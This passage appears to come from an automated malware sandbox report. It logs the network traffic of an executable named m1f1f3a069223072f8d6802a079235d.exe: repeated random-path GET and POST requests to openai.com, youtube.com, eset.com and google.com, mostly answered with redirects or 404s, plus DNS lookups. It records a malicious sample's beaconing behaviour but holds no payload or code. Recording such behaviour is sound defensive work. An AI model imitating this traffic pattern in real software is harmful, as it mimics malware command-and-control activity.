      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g1
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-174cb64fdd75m6xxh6yn3vv8ys000000021g0000000037g3
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      DNS
      youtube.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      youtube.com
      IN A
      Response
      youtube.com
      IN A
      216.58.204.78
    • flag-gb
      GET
      http://youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      216.58.204.78:80
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: application/binary
      X-Content-Type-Options: nosniff
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Location: https://youtube.com/YggOLR313W?q=26
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
    • flag-sk
      POST
      http://eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /No0TnWnOx1?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 152
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:30:01 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/No0TnWnOx1?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bgk
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bgm
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bhd
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023002Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7f
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T023002Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7q
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7s
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7w
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d80
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-gb
      GET
      https://youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      216.58.204.78:443
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: application/binary
      X-Content-Type-Options: nosniff
      Expires: Wed, 10 Apr 2024 02:30:02 GMT
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Cache-Control: private, max-age=31536000
      Location: https://www.youtube.com/YggOLR313W?q=26
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-Frame-Options: SAMEORIGIN
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
      Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Connection: close
    • flag-us
      DNS
      www.eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.eset.com
      IN A
      Response
      www.eset.com
      IN CNAME
      www-eset-com.trafficmanager.net
      www-eset-com.trafficmanager.net
      IN CNAME
      www.eset.com.edgesuite.net
      www.eset.com.edgesuite.net
      IN CNAME
      a1281.dscr.akamai.net
      a1281.dscr.akamai.net
      IN A
      104.117.77.144
      a1281.dscr.akamai.net
      IN A
      104.117.77.121
    • flag-sk
      POST
      http://eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /No0TnWnOx1?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 152
      Expect: 100-continue
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/No0TnWnOx1?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1/?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: max-age=3600
      Date: Wed, 10 Apr 2024 02:30:05 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Connection: Transfer-Encoding
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1/?q=0 HTTP/1.1
      Host: www.eset.com
    • flag-us
      DNS
      www.youtube.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.youtube.com
      IN A
      Response
      www.youtube.com
      IN CNAME
      youtube-ui.l.google.com
      youtube-ui.l.google.com
      IN A
      172.217.16.238
      youtube-ui.l.google.com
      IN A
      142.250.200.14
      youtube-ui.l.google.com
      IN A
      142.250.200.46
      youtube-ui.l.google.com
      IN A
      216.58.201.110
      youtube-ui.l.google.com
      IN A
      216.58.204.78
      youtube-ui.l.google.com
      IN A
      216.58.213.14
      youtube-ui.l.google.com
      IN A
      172.217.169.14
      youtube-ui.l.google.com
      IN A
      172.217.169.78
      youtube-ui.l.google.com
      IN A
      172.217.169.46
      youtube-ui.l.google.com
      IN A
      142.250.179.238
      youtube-ui.l.google.com
      IN A
      142.250.180.14
      youtube-ui.l.google.com
      IN A
      142.250.187.206
      youtube-ui.l.google.com
      IN A
      142.250.187.238
      youtube-ui.l.google.com
      IN A
      142.250.178.14
    • flag-gb
      GET
      https://www.youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      172.217.16.238:443
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: www.youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      X-Content-Type-Options: nosniff
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      X-Frame-Options: SAMEORIGIN
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
      Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
      P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
      Server: ESF
      X-XSS-Protection: 0
      Set-Cookie: YSC=62yr8bgxCDs; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
      Set-Cookie: __Secure-YEC=Cgt0b1ZCcTBMRTh1cyir89ewBjIKCgJHQhIEGgAgMg%3D%3D; Domain=.youtube.com; Expires=Sat, 10-May-2025 02:30:02 GMT; Path=/; Secure; HttpOnly; SameSite=lax
      Set-Cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgMg%3D%3D; Domain=.youtube.com; Expires=Sat, 10-May-2025 02:30:03 GMT; Path=/; Secure; HttpOnly; SameSite=none
      Set-Cookie: VISITOR_INFO1_LIVE=; Domain=.youtube.com; Expires=Thu, 15-Jul-2021 02:30:03 GMT; Path=/; Secure; HttpOnly; SameSite=none
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Accept-Ranges: none
      Vary: Accept-Encoding
      Transfer-Encoding: chunked
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: close
    • flag-us
      DNS
      144.77.117.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      144.77.117.104.in-addr.arpa
      IN PTR
      Response
      144.77.117.104.in-addr.arpa
      IN PTR
      a104-117-77-144deploystaticakamaitechnologiescom
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
